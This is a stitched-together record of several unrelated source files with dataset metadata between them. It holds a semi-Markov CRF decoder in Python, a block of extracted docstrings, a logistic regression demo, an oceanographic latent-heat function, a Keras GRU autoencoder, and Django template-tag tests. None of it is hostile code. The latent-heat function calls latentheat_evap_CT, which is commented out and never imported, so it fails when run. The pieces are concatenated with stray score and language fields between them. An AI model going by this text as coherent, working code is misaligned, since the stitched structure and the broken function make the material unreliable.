    alpha = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
    # base case: only the empty prefix is reachable at position 0
    alpha[0, P_codebook[""]] = 0
    fpotential_perboundary = {}
    for j in range(1, T + 1):
        # accumulator[pi, d] holds the contribution of segments of length d+1
        accumulator = (
            numpy.ones((len(P_codebook), L), dtype="longdouble") * -numpy.inf
        )
        for d in range(L):
            u = j - d
            if u <= 0:
                break
            v = j
            f_potential = self.compute_fpotential(w, activefeatures[u, v])
            # cache potentials; backward/marginal computations reuse them
            fpotential_perboundary[u, v] = f_potential
            for pi in pi_pky_map:
                # a prefix of P_len[pi] labels cannot occur before that position
                if j >= P_len[pi]:
                    pi_c = P_codebook[pi]
                    pky_c_list, pk_c_list = pi_pky_map[pi]
                    vec = f_potential[pky_c_list] + alpha[u - 1, pk_c_list]
                    accumulator[pi_c, d] = vectorized_logsumexp(vec)
        for pi in pi_pky_map:
            if j >= P_len[pi]:
                pi_c = P_codebook[pi]
                if L > 1:
                    # combine contributions across all segment lengths
                    alpha[j, pi_c] = vectorized_logsumexp(accumulator[pi_c, :])
                else:
                    alpha[j, pi_c] = accumulator[pi_c, 0]
    self.seqs_info[seq_id]["fpotential"] = fpotential_perboundary
    return alpha
def compute_backward_vec(self, w, seq_id):
    """Compute the backward matrix (beta matrix) in log-space.

    Args:
        w: weight vector (numpy vector) -- not read here; the potentials
            cached by :meth:`compute_forward_vec` are reused instead
        seq_id: integer representing unique id assigned to the sequence

    .. note::
        fpotential per boundary dictionary should be available in :attr:`seqs_info`
    """
    model = self.model
    pi_pky_map = model.pi_pky_map
    P_codebook = model.P_codebook
    len_P = len(P_codebook)
    T = self.seqs_info[seq_id]["T"]
    L = model.L
    fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
    beta = numpy.ones((T + 2, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
    # base case: every state is an acceptable end state past the last position
    beta[T + 1, :] = 0
    for j in reversed(range(1, T + 1)):
        # accum_mat[pk, d] collects contributions of segments of length d+1
        accum_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
        for d in range(L):
            # track_comp[pk, pi] holds the score of moving from pk to pi
            track_comp = numpy.ones((len_P, len_P), dtype="longdouble") * (
                -numpy.inf
            )
            u = j
            v = j + d
            if v > T:
                break
            f_potential = fpotential_perboundary[u, v]
            for pi in pi_pky_map:
                pi_c = P_codebook[pi]
                pky_c_list, pk_c_list = pi_pky_map[pi]
                vec = f_potential[pky_c_list] + beta[v + 1, pi_c]
                track_comp[pk_c_list, pi_c] = vec
            for p_c in P_codebook.values():
                accum_mat[p_c, d] = vectorized_logsumexp(track_comp[p_c, :])
        for p_c in P_codebook.values():
            beta[u, p_c] = vectorized_logsumexp(accum_mat[p_c, :])
    return beta
def compute_marginals(self, seq_id):
    """Compute the marginal probability of each y pattern at each position.

    Args:
        seq_id: integer representing unique id assigned to the sequence

    .. note::
        - fpotential per boundary dictionary should be available in :attr:`seqs_info`
        - alpha matrix should be available in :attr:`seqs_info`
        - beta matrix should be available in :attr:`seqs_info`
        - Z (the normalization term, subtracted in log-space below) should be
          available in :attr:`seqs_info`
    """
    model = self.model
    Z_codebook = model.Z_codebook
    z_pi_piy = model.z_pi_piy_map
    T = self.seqs_info[seq_id]["T"]
    L = self.model.L
    alpha = self.seqs_info[seq_id]["alpha"]
    beta = self.seqs_info[seq_id]["beta"]
    Z = self.seqs_info[seq_id]["Z"]
    fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
    P_marginals = numpy.zeros(
        (L, T + 1, len(self.model.Z_codebook)), dtype="longdouble"
    )
    for j in range(1, T + 1):
        for d in range(L):
            u = j
            v = j + d
            if v > T:
                break
            boundary = (u, v)
            f_potential = fpotential_perboundary[boundary]
            for z in Z_codebook:
                # NOTE(review): per map_pky_z the tuple order is
                # ([pk codes], [pky codes], [pi codes]); the local names
                # below are misleading (pi_c holds pk codes, pk_c holds
                # pi codes) but the arithmetic is consistent with it.
                pi_c, piy_c, pk_c = z_pi_piy[z]
                numerator = (
                    alpha[u - 1, pi_c] + f_potential[piy_c] + beta[v + 1, pk_c]
                )
                P_marginals[d, j, Z_codebook[z]] = numpy.exp(
                    vectorized_logsumexp(numerator) - Z
                )
    return P_marginals
def compute_feature_expectation(self, seq_id, P_marginals, grad):
    """Compute feature expectations (expected counts under the learned model).

    Args:
        seq_id: integer representing unique id assigned to the sequence
        P_marginals: probability matrix for y patterns at each position in time
        grad: numpy vector with dimension equal to the weight vector; updated
            in place with the computed expectations

    .. note::
        activefeatures (per boundary) dictionary should be available in
        :attr:`seqs_info`.
    """
    Z_codebook = self.model.Z_codebook
    activefeatures = self.seqs_info[seq_id]["activefeatures"]
    for (u, v), features_dict in activefeatures.items():
        seg_len = v - u  # zero-based segment-length index into P_marginals
        for z_patt, (w_indx, f_val) in features_dict.items():
            grad[w_indx] += f_val * P_marginals[seg_len, u, Z_codebook[z_patt]]
def prune_states(self, score_vec, beam_size):
    """Return the set of states that survive beam pruning.

    Args:
        score_vec: numpy vector of scores, one per forward state (pi).
        beam_size: number of top-scoring states to keep (integer).

    Returns:
        Set of the last label of each top-scoring forward state.
    """
    codebook_rev = self.model.P_codebook_rev
    elems = self.model.P_elems
    # argpartition is O(n) versus argsort's O(n log n); negating the
    # scores turns "take the largest" into a smallest-first partition.
    top_indices = numpy.argpartition(-score_vec, beam_size)[:beam_size]
    surviving = set()
    for idx in top_indices:
        prefix = codebook_rev[idx]
        # keep only the terminal label of the surviving prefix
        surviving.add(elems[prefix][-1])
    return surviving
def viterbi(self, w, seq_id, beam_size, stop_off_beam=False, y_ref=[], K=1):
    """Decode a sequence with the semi-Markov Viterbi algorithm.

    Args:
        w: weight vector (numpy vector)
        seq_id: integer representing unique id assigned to the sequence
        beam_size: size of the beam; equal to ``model.num_states`` selects
            exact decoding, anything smaller selects beam (inexact) decoding

    Keyword Arguments:
        stop_off_beam: boolean indicating if to stop when the reference state
            falls off the beam (used in perceptron/search based learning)
        y_ref: reference sequence list of labels (used while learning).
            NOTE(review): mutable default ``[]`` -- harmless here because it
            is only read, never mutated, but ``None`` would be safer.
        K: integer indicating number of decoded sequences required (top-K);
            for K > 1 an A* searcher over the Viterbi lattice generates the
            k-decoded list

    Returns:
        tuple ``(decoded, viol_index)`` where ``decoded`` is the best label
        sequence (K == 1) or the top-K list (K > 1), and ``viol_index``
        holds the 1-based positions where the reference fell off the beam.
    """
    model = self.model
    P_elems = model.P_elems
    pi_pky_map = model.pi_pky_map
    P_codebook = model.P_codebook
    P_codebook_rev = model.P_codebook_rev
    L = model.L
    len_P = len(P_codebook)
    num_states = model.num_states
    T = self.seqs_info[seq_id]["T"]
    # delta[j, pi] records the max score of any labelling ending at
    # position j in forward state pi
    delta = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
    # per-position scratch: best score per (state, segment-length) pair
    pi_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
    # the score for the empty sequence at time 0 is 1 (log-score 0)
    delta[0, P_codebook[""]] = 0
    back_track = {}
    # records where violation occurs -- it is 1-based indexing
    viol_index = []
    if beam_size == num_states:
        # case of exact search and decoding: all active features are
        # precomputed and cached for the whole sequence
        l = {}
        l["activefeatures"] = (seq_id,)
        self.check_cached_info(seq_id, l)
        active_features = self.seqs_info[seq_id]["activefeatures"]
        for j in range(1, T + 1):
            # reset pi_mat at every position
            pi_mat.fill(-numpy.inf)
            backpointer = {}
            for d in range(L):
                # candidate segment covers positions u..j (length d + 1)
                u = j - d
                if u <= 0:
                    break
                v = j
                boundary = (u, v)
                # vector of size len(pky): potential per (prefix, label) pair
                f_potential = self.compute_fpotential(w, active_features[boundary])
                for pi in pi_pky_map:
                    pi_c = P_codebook[pi]
                    pky_c_list, pk_c_list = pi_pky_map[pi]
                    # segment potential plus best score of the predecessor state
                    vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
                    pi_mat[pi_c, d] = numpy.max(vec)
                    argmax_indx = numpy.argmax(vec)
                    pk_c_max = pk_c_list[argmax_indx]
                    pk = P_codebook_rev[pk_c_max]
                    y = P_elems[pk][-1]
                    # remember the best predecessor and its terminal label
                    backpointer[d, pi_c] = (pk_c_max, y)
            # get the max for each pi across all segment lengths
            for pi in pi_pky_map:
                pi_c = P_codebook[pi]
                delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
                argmax_indx = numpy.argmax(pi_mat[pi_c, :])
                pk_c, y = backpointer[argmax_indx, pi_c]
                back_track[j, pi_c] = (argmax_indx, pk_c, y)
    else:
        # case of inexact search and decoding: active features are
        # identified on the fly, restricted to the surviving beam states
        l = {}
        l["seg_features"] = (seq_id,)
        self.check_cached_info(seq_id, l)
        # tracks active states by boundary
        accum_activestates = {}
        for j in range(1, T + 1):
            # reset pi_mat at every position
            pi_mat.fill(-numpy.inf)
            backpointer = {}
            for d in range(L):
                u = j - d
                if u <= 0:
                    break
                v = j
                boundary = (u, v)
                active_features = self.identify_activefeatures(
                    seq_id, boundary, accum_activestates
                )
                # vector of size len(pky)
                f_potential = self.compute_fpotential(w, active_features)
                for pi in pi_pky_map:
                    pi_c = P_codebook[pi]
                    pky_c_list, pk_c_list = pi_pky_map[pi]
                    vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
                    pi_mat[pi_c, d] = numpy.max(vec)
                    argmax_indx = numpy.argmax(vec)
                    pk_c_max = pk_c_list[argmax_indx]
                    pk = P_codebook_rev[pk_c_max]
                    y = P_elems[pk][-1]
                    backpointer[d, pi_c] = (pk_c_max, y)
                # prune: only states within the beam stay active at this boundary
                topk_states = self.prune_states(pi_mat[:, d], beam_size)
                # update tracked active states -- to consider renaming it
                accum_activestates[boundary] = accum_activestates[
                    boundary
                ].intersection(topk_states)
            # get the max for each pi across all segment lengths
            for pi in pi_pky_map:
                pi_c = P_codebook[pi]
                delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
                argmax_indx = numpy.argmax(pi_mat[pi_c, :])
                pk_c, y = backpointer[argmax_indx, pi_c]
                back_track[j, pi_c] = (argmax_indx, pk_c, y)
            # in case we are using viterbi for learning: record positions
            # where the reference label falls off the beam
            if y_ref:
                topk_states = self.prune_states(delta[j, :], beam_size)
                if y_ref[j - 1] not in topk_states:
                    viol_index.append(j)
                    if stop_off_beam:
                        # truncate decoding at the first violation
                        T = j
                        break
    if K == 1:
        # decoding the single best sequence by backtracking
        Y_decoded = []
        p_T_c = numpy.argmax(delta[T, :])
        p_T = P_codebook_rev[p_T_c]
        y_T = P_elems[p_T][-1]
        d, pt_c, yt = back_track[T, p_T_c]
        # expand the final segment: one label per covered position
        for _ in range(d + 1):
            Y_decoded.append(y_T)
        t = T - d - 1
        while t > 0:
            new_d, new_pt_c, new_yt = back_track[t, pt_c]
            for _ in range(new_d + 1):
                Y_decoded.append(yt)
            t = t - new_d - 1
            pt_c = new_pt_c
            yt = new_yt
        # labels were collected back-to-front
        Y_decoded.reverse()
        return (Y_decoded, viol_index)
    else:
        # K > 1: A* search over the Viterbi lattice yields the top-K list
        asearcher = HOSemi_AStarSearcher(P_codebook_rev, P_elems)
        topK = asearcher.search(delta, back_track, T, K)
        return (topK, viol_index)
# Module is intended to be imported; no standalone entry point.
if __name__ == "__main__":
    pass
|
en
| 0.716332
|
@author: <NAME> <<EMAIL>> Model representation that will hold data structures to be used in :class:`HOSemiCRF` class Attributes: P_codebook: set of proper prefixes of the elements in the set of patterns :attr:`Z_codebook` e.g. {'':0, 'P':1, 'L':2, 'O':3, 'L|O':4, ...} P_codebook_rev: reversed codebook of :attr:`P_codebook` e.g. {0:'', 1:'P', 2:'L', 3:'O', 4:'L|O', ...} P_len: dictionary comprising the length (i.e. number of elements) of elements in :attr:`P_codebook` e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':2, ...} P_elems: dictionary comprising the composing elements of every prefix in :attr:`P_codebook` e.g. {'':('',), 'P':('P',), 'L':('L',), 'O':('O',), 'L|O':('L','O'), ...} P_numchar: dictionary comprising the number of characters for every prefix in :attr:`P_codebook` e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':3, ...} f_transition: a dictionary representing forward transition data structure having the form: {pi:{pky, (pk, y)}} where pi represents the longest prefix element in :attr:`P_codebook` for pky (representing the concatenation of elements in :attr:`P_codebook` and :attr:`Y_codebook`) pky_codebook: generate a codebook for the elements of the set PY (the product of set P and Y) pi_pky_map: a map between P elements and PY elements z_pky_map: a map between elements of the Z set and PY set it has the form/template {ypattern:[pky_elements]} z_pi_piy_map: a map between elements of the Z set and PY set it has the form/template {ypattern:(pk, pky, pi)} # call super class setup and create the model representation Creates all maps and codebooks needed by the :class:`HOSemiCRFAD` class Args: modelfeatures: set of features defining the model states: set of states (i.e. 
tags) L: length of longest segment generate instance properties that will be later used by :class:`HOSemiCRFAD` class create set of forward states (referred to set P) and map each element to unique code P is set of proper prefixes of the elements in :attr:`Z_codebook` set # empty element # print("P_codebook ", P_codebook) generate reversed codebook of :attr:`P_codebook` get the properties of P set (proper prefixes) generate forward transition data structure Main tasks: - create a set PY from the product of P and Y sets - for each element in PY, determine the longest suffix existing in set P - include all this info in :attr:`f_transition` dictionary # pk_y= {} # for p in P_codebook: # for y in Y_codebook: # pk_y[(p, y)] = 1 # check suffix relation # check = self.check_suffix(p, ref_str) # print("f_transition ", f_transition) generate a codebook for the elements of the set PY (the product of set P and Y) generate a map between elements of the Z set and PY set # given that we demand to have a unigram label features then Z set will always contain Y elems # get number of characters in the pky # +1 is for the separator '|' # check suffix relation generate map between P elements and PY elements Main tasks: - for every element in PY, determine the longest suffix in P - determine the two components in PY (i.e. 
p and y element) - represent this info in a dictionary that will be used for forward/alpha matrix # convert list to numpy arrays # for i in range(2): # pi_pky_map[pi][i] = numpy.array(pi_pky_map[pi][i]) # pi_pky_map[pi] = tuple(pi_pky_map[pi]) filter/prune states and y features Args: activaed_states: dictionary containing possible active states/y features it has the form {patt_len:{patt_1, patt_2, ...}} accum_active_states: dictionary of only possible active states by position it has the form {pos_1:{state_1, state_2, ...}} boundary: tuple (u,v) representing the current boundary in the sequence # generate partition boundaries higher-order semi-CRF model that uses algorithmic differentiation in gradient computation Args: model: an instance of :class:`HOSemiCRFADModelRepresentation` class seqs_representer: an instance of :class:`SeqsRepresenter` class seqs_info: dictionary holding sequences info Keyword Arguments: load_info_fromdisk: integer from 0 to 5 specifying number of cached data to be kept in memory. 
0 means keep everything while 5 means load everything from disk Attributes: model: an instance of :class:`HOSemiCRFADModelRepresentation` class weights: a numpy vector representing feature weights seqs_representer: an instance of :class:`pyseqlab.feature_extraction.SeqsRepresenter` class seqs_info: dictionary holding sequences info beam_size: determines the size of the beam for state pruning fun_dict: a function map def_cached_entities: a list of the names of cached entities sorted (descending) based on estimated space required in memory construct list of names of cached entities in memory compute the potential of active features in a specified boundary Args: w: weight vector (numpy vector) active_features: dictionary of activated features in a specified boundary # to consider caching the w_indx and fval as in cached_pf # get all pky's in coded format where z maintains a suffix relation with them compute the forward matrix (alpha matrix) Args: w: weight vector (numpy vector) seq_id: integer representing unique id assigned to the sequence .. note:: activefeatures need to be loaded first in :attr:`seqs.info` compute the backward matrix (beta matrix) Args: w: weight vector (numpy vector) seq_id: integer representing unique id assigned to the sequence .. note:: fpotential per boundary dictionary should be available in :attr:`seqs.info` compute the marginal (i.e. probability of each y pattern at each position) Args: seq_id: integer representing unique id assigned to the sequence .. note:: - fpotential per boundary dictionary should be available in :attr:`seqs.info` - alpha matrix should be available in :attr:`seqs.info` - beta matrix should be available in :attr:`seqs.info` - Z (i.e. P(x)) should be available in :attr:`seqs.info` compute the features expectations (i.e. 
expected count of the feature based on learned model) Args: seq_id: integer representing unique id assigned to the sequence P_marginals: probability matrix for y patterns at each position in time grad: numpy vector with dimension equal to the weight vector. It represents the gradient that will be computed using the feature expectation and the global features of the sequence .. note:: - activefeatures (per boundary) dictionary should be available in :attr:`seqs.info` - P_marginal (marginal probability matrix) should be available in :attr:`seqs.info` prune states that fall off the specified beam size Args: score_vec: score matrix beam_size: specified size of the beam (integer) # using argpartition as better alternative to argsort # identify top-k states/pi # get topk states decode sequences using viterbi decoder Args: w: weight vector (numpy vector) seq_id: integer representing unique id assigned to the sequence beam_size: integer representing the size of the beam Keyword Arguments: stop_off_beam: boolean indicating if to stop when the reference state \ falls off the beam (used in perceptron/search based learning) y_ref: reference sequence list of labels (used while learning) K: integer indicating number of decoded sequences required (i.e. 
top-k list) A* searcher with viterbi will be used to generate k-decoded list # records max score at every time step # the score for the empty sequence at time 0 is 1 # records where violation occurs -- it is 1-based indexing # case of exact search and decoding # reset pi_mat at every loop # vector of size len(pky) # print("f_potential[pky_c_list] ", f_potential[pky_c_list]) # print("delta[u-1, pk_c_list] ", delta[u-1, pk_c_list]) # print("vec ", vec) # print("argmax chosen ", argmax_ind) # print('pk_c ', pk_c) # print("backpointer ") # print(backpointer) # print("pi_mat") # print(pi_mat) # get the max for each pi across all segment lengths # print("delta ") # print(delta) # print("backtrack ") # print(back_track) # case of inexact search and decoding # tracks active states by boundary # reset pi_mat at every loop # vector of size len(pky) # print("argmax chosen ", argmax_ind) # print('pk_c ', pk_c) # update tracked active states -- to consider renaming it # get the max for each pi across all segment lengths # in case we are using viterbi for learning # decoding the sequence # print("y_decoded ", Y_decoded) # print('topk ', topK)
| 2.36781
| 2
|
examples/example_logical.py
|
Xamber/Bhaalgorn
| 0
|
6627610
|
import numpy as np
from regression import LogisticRegression

# Seed NumPy's global RNG so training is reproducible run to run.
np.random.seed(123)

# Toy training data: each row is (x1, x2, label); points with large
# coordinates are class 1, points near the origin are class 0.
training_set_logic = np.array([
    [0.5, 1.0, 1],
    [0.5, 0.6, 1],
    [0.6, 0.5, 1],
    [1.0, 1.0, 1],
    [0.1, 0.1, 0],
    [0.1, 0.3, 0],
    [0.2, 0.1, 0],
    [0.0, 0.0, 0],
    [0.4, 0.4, 0],
])

# Fit by gradient descent for 3000 iterations, then report the result.
classifier = LogisticRegression(training_set_logic)
classifier.train_gradient(3000)
classifier.show_info()
|
import numpy as np
from regression import LogisticRegression

# Seed the global RNG for reproducible training runs.
np.random.seed(123)

# Toy training data: rows are (x1, x2, label); class 1 points have
# larger coordinates than class 0 points.
training_set_logic = np.array([
    [0.5, 1.0, 1],
    [0.5, 0.6, 1],
    [0.6, 0.5, 1],
    [1.0, 1.0, 1],
    [0.1, 0.1, 0],
    [0.1, 0.3, 0],
    [0.2, 0.1, 0],
    [0.0, 0.0, 0],
    [0.4, 0.4, 0],
])

logical = LogisticRegression(training_set_logic)
logical.train_gradient(3000)  # 3000 gradient-descent iterations
logical.show_info()
|
none
| 1
| 2.94126
| 3
|
|
gsw/gibbs/isobaric.py
|
ocefpaf/python-gsw
| 35
|
6627611
|
<reponame>ocefpaf/python-gsw
# -*- coding: utf-8 -*-
from __future__ import division
from .conversions import CT_from_pt
from ..utilities import match_args_return
__all__ = ['latentheat_evap_t']
# 'latentheat_evap_CT',
# 'latentheat_melting',
#@match_args_return
#def latentheat_evap_CT(SA, CT):
# pass
#@match_args_return
#def latentheat_melting(SA, p):
# pass
@match_args_return
def latentheat_evap_t(SA, t):
    r"""
    Calculates latent heat, or enthalpy, of evaporation at p = 0 (the
    surface). It is defined as a function of Absolute Salinity, SA, and
    in-situ temperature, t, and is valid in the ranges 0 < SA < 40 g/kg and
    0 < CT < 42 deg C. The errors range between -0.4 and 0.6 J/kg.

    Parameters
    ----------
    SA : array_like
        Absolute salinity [g kg :sup:`-1`]
    t : array_like
        in situ temperature [:math:`^\circ` C (ITS-90)]

    Returns
    -------
    latentheat_evap_t : array_like
        latent heat of evaporation [J kg :sup:`-1`]

    References
    ----------
    .. [1] IOC, SCOR and IAPSO, 2010: The international thermodynamic equation
    of seawater - 2010: Calculation and use of thermodynamic properties.
    Intergovernmental Oceanographic Commission, Manuals and Guides No. 56,
    UNESCO (English), 196 pp. See section 3.39.
    """
    # Convert in-situ temperature to Conservative Temperature first.
    CT = CT_from_pt(SA, t)
    # NOTE(review): latentheat_evap_CT is neither defined in this module
    # (its stub is commented out above) nor imported, so this call raises
    # NameError at runtime -- restore or import it before using this function.
    return latentheat_evap_CT(SA, CT)
if __name__ == '__main__':
    # Run this module's doctests when executed directly.
    import doctest
    doctest.testmod()
|
# -*- coding: utf-8 -*-
from __future__ import division
from .conversions import CT_from_pt
from ..utilities import match_args_return
__all__ = ['latentheat_evap_t']
# 'latentheat_evap_CT',
# 'latentheat_melting',
#@match_args_return
#def latentheat_evap_CT(SA, CT):
# pass
#@match_args_return
#def latentheat_melting(SA, p):
# pass
@match_args_return
def latentheat_evap_t(SA, t):
    r"""
    Calculates latent heat, or enthalpy, of evaporation at p = 0 (the
    surface). It is defined as a function of Absolute Salinity, SA, and
    in-situ temperature, t, and is valid in the ranges 0 < SA < 40 g/kg and
    0 < CT < 42 deg C. The errors range between -0.4 and 0.6 J/kg.

    Parameters
    ----------
    SA : array_like
        Absolute salinity [g kg :sup:`-1`]
    t : array_like
        in situ temperature [:math:`^\circ` C (ITS-90)]

    Returns
    -------
    latentheat_evap_t : array_like
        latent heat of evaporation [J kg :sup:`-1`]

    References
    ----------
    .. [1] IOC, SCOR and IAPSO, 2010: The international thermodynamic equation
    of seawater - 2010: Calculation and use of thermodynamic properties.
    Intergovernmental Oceanographic Commission, Manuals and Guides No. 56,
    UNESCO (English), 196 pp. See section 3.39.
    """
    CT = CT_from_pt(SA, t)
    # NOTE(review): latentheat_evap_CT is commented out above and not
    # imported -- this call raises NameError at runtime.
    return latentheat_evap_CT(SA, CT)
if __name__ == '__main__':
    # Run this module's doctests when executed directly.
    import doctest
    doctest.testmod()
|
en
| 0.537204
|
# -*- coding: utf-8 -*- # 'latentheat_evap_CT', # 'latentheat_melting', #@match_args_return #def latentheat_evap_CT(SA, CT): # pass #@match_args_return #def latentheat_melting(SA, p): # pass Calculates latent heat, or enthalpy, of evaporation at p = 0 (the surface). It is defined as a function of Absolute Salinity, SA, and in-situ temperature, t, and is valid in the ranges 0 < SA < 40 g/kg and 0 < CT < 42 deg C. The errors range between -0.4 and 0.6 J/kg. Parameters ---------- SA : array_like Absolute salinity [g kg :sup:`-1`] t : array_like in situ temperature [:math:`^\circ` C (ITS-90)] Returns ------- latentheat_evap_t : array_like latent heat of evaporation [J kg :sup:`-1`] References ---------- .. [1] IOC, SCOR and IAPSO, 2010: The international thermodynamic equation of seawater - 2010: Calculation and use of thermodynamic properties. Intergovernmental Oceanographic Commission, Manuals and Guides No. 56, UNESCO (English), 196 pp. See section 3.39.
| 2.432606
| 2
|
genart/tf/morph/model.py
|
dyf/genart
| 0
|
6627612
|
<reponame>dyf/genart
import tensorflow as tf
from tensorflow.keras.layers import LSTM, GRU, Dense, Bidirectional, Input, RepeatVector, TimeDistributed, Dropout
from tensorflow.keras.models import Sequential
from tensorflow.keras import Model
def MorphModel(input_shape):
    """Build a GRU sequence autoencoder for morphing frames.

    input_shape: (timesteps, features) of each input sequence; the model
    outputs a sequence of the same shape.
    """
    timesteps, features = input_shape[0], input_shape[1]
    # Encoder: two stacked GRUs compress the sequence into a single
    # 256-dim latent vector, with dropout for regularisation.
    encoder_layers = [
        GRU(512, activation='relu', input_shape=(timesteps, features), return_sequences=True),
        GRU(256, activation='sigmoid', return_sequences=False),
        Dropout(0.2),
    ]
    # Decoder: repeat the latent vector across time and expand back to
    # a per-timestep feature vector.
    decoder_layers = [
        RepeatVector(timesteps),
        GRU(256, activation='relu', return_sequences=True),
        GRU(512, activation='relu', return_sequences=True),
        TimeDistributed(Dense(features)),
    ]
    return Sequential(encoder_layers + decoder_layers)
|
import tensorflow as tf
from tensorflow.keras.layers import LSTM, GRU, Dense, Bidirectional, Input, RepeatVector, TimeDistributed, Dropout
from tensorflow.keras.models import Sequential
from tensorflow.keras import Model
def MorphModel(input_shape):
    """Build a GRU encoder--decoder that reconstructs sequences of shape
    ``input_shape`` = (timesteps, features)."""
    return Sequential([
        # Encoder: compress the sequence to a 256-dim latent vector.
        GRU(512, activation='relu', input_shape=(input_shape[0], input_shape[1]), return_sequences=True),
        GRU(256, activation='sigmoid', return_sequences=False),
        Dropout(0.2),
        # Decoder: repeat the latent vector and expand back to a sequence.
        RepeatVector(input_shape[0]),
        GRU(256, activation='relu', return_sequences=True),
        GRU(512, activation='relu', return_sequences=True),
        TimeDistributed(Dense(input_shape[1]))
    ])
|
none
| 1
| 2.736704
| 3
|
|
tests/test_template.py
|
beproud/bpcommons
| 2
|
6627613
|
<reponame>beproud/bpcommons
#:coding=utf-8:
from __future__ import print_function
from django import VERSION as DJANGO_VERSION
from django.test import TestCase as DjangoTestCase
from django.template import TemplateSyntaxError
try:
from django.template import (
Lexer,
Parser,
)
except ImportError:
from django.template.base import (
Lexer,
Parser,
)
from django.template import Origin
from django.template.context import Context
class BaseTemplateTagTest(object):
    """Mixin with helpers to render template strings through the
    test-app's custom tag library across Django versions."""

    def _make_origin(self):
        # Origin metadata required by the pre-1.9 Lexer constructor.
        return Origin("Commons Test", lambda x,y: ("<string>", "<string>"), "commons", [])

    def _render_html(self, template_string, context={}):
        # :(
        # NOTE(review): mutable default ``context={}`` -- harmless while it
        # is only read, but ``None`` would be the safer convention.
        # import_library moved packages in Django 1.9.
        if DJANGO_VERSION > (1,9):
            from django.template.library import import_library
            tag_lib = import_library('testapp.tags')
        else: # DJANGO_VERSION > (1,7):
            from django.template.base import import_library
            tag_lib = import_library('testapp.tags')
        # The Lexer constructor signature differs across these versions:
        # only the older one takes an origin argument.
        if DJANGO_VERSION > (1,9):
            lexer = Lexer(template_string)
        else:
            lexer = Lexer(template_string, self._make_origin())
        parser = Parser(lexer.tokenize())
        parser.add_library(tag_lib)
        nodelist = parser.parse()
        return nodelist.render(Context(context))
class DataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
    """Tests for the ``get_my_data`` assignment tag."""

    # Well-formed usage: ``as`` stores the result in a context variable.
    TEMPLATE_STRING = "<html><body>{% get_my_data 121 as my_data %}{{ my_data }}</body></html>"
    # Malformed usage: the ``as`` keyword is missing.
    BAD_TEMPLATE_STRING = "<html><body>{% get_my_data 121 my_data %}{{ my_data }}</body></html>"

    def test_data_template_tag(self):
        # The tag resolves to the test app's canned value.
        self.assertEqual(self._render_html(self.TEMPLATE_STRING), "<html><body>MY DATA</body></html>")

    def test_bad_template_tag(self):
        # Omitting ``as`` must be rejected at parse time.
        with self.assertRaises(TemplateSyntaxError):
            print(self._render_html(self.BAD_TEMPLATE_STRING))
class KwargDataTemplateTagTestCase(BaseTemplateTagTest, DjangoTestCase):
    """Tests for ``get_my_kwarg_data``, which accepts optional
    ``status``/``other`` keyword arguments (literal or context-resolved)."""

    TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 as my_data %}{{ my_data }}</body></html>"
    TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data 121 status='spam' as my_data %}{{ my_data }}</body></html>"
    TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data 121 other='eggs' as my_data %}{{ my_data }}</body></html>"
    TEMPLATE_STRING4 = "<html><body>{% get_my_kwarg_data 121 status='spam' other='eggs' as my_data %}{{ my_data }}</body></html>"
    # Unquoted values resolve against the render context (see tag5 below).
    TEMPLATE_STRING5 = "<html><body>{% get_my_kwarg_data 121 status=spam other=eggs as my_data %}{{ my_data }}</body></html>"
    BAD_TEMPLATE_STRING1 = "<html><body>{% get_my_kwarg_data 121 my_data %}{{ my_data }}</body></html>"
    BAD_TEMPLATE_STRING2 = "<html><body>{% get_my_kwarg_data %}{{ my_data }}</body></html>"
    # NOTE(review): BAD_TEMPLATE_STRING3 is defined but never rendered by
    # any test -- a test_bad_template_tag3 appears to be missing.
    BAD_TEMPLATE_STRING3 = "<html><body>{% get_my_kwarg_data as my_data %}{{ my_data }}</body></html>"
    BASE_HTML = "<html><body>%s</body></html>"

    def test_kwarg_data_template_tag1(self):
        # No kwargs: defaults render as "None" and "other".
        self.assertEqual(self._render_html(self.TEMPLATE_STRING1), self.BASE_HTML % "121:None:other")

    def test_kwarg_data_template_tag2(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING2), self.BASE_HTML % "121:spam:other")

    def test_kwarg_data_template_tag3(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING3), self.BASE_HTML % "121:None:eggs")

    def test_kwarg_data_template_tag4(self):
        self.assertEqual(self._render_html(self.TEMPLATE_STRING4), self.BASE_HTML % "121:spam:eggs")

    def test_kwarg_data_template_tag5(self):
        # Unquoted kwarg values are looked up in the context mapping.
        self.assertEqual(self._render_html(self.TEMPLATE_STRING5, {"spam": "eggs", "eggs": "spam"}), self.BASE_HTML % "121:eggs:spam")

    def test_bad_template_tag1(self):
        with self.assertRaises(TemplateSyntaxError):
            print(self._render_html(self.BAD_TEMPLATE_STRING1))

    def test_bad_template_tag2(self):
        with self.assertRaises(TemplateSyntaxError):
            print(self._render_html(self.BAD_TEMPLATE_STRING2))
|
#:coding=utf-8:
from __future__ import print_function
from django import VERSION as DJANGO_VERSION
from django.test import TestCase as DjangoTestCase
from django.template import TemplateSyntaxError
try:
from django.template import (
Lexer,
Parser,
)
except ImportError:
from django.template.base import (
Lexer,
Parser,
)
from django.template import Origin
from django.template.context import Context
class BaseTemplateTagTest(object):
    """Mixin: render template strings through the test-app tag library,
    handling Django-version differences."""

    def _make_origin(self):
        # Origin metadata required by the pre-1.9 Lexer constructor.
        return Origin("Commons Test", lambda x,y: ("<string>", "<string>"), "commons", [])

    def _render_html(self, template_string, context={}):
        # :(
        # import_library moved packages in Django 1.9.
        if DJANGO_VERSION > (1,9):
            from django.template.library import import_library
            tag_lib = import_library('testapp.tags')
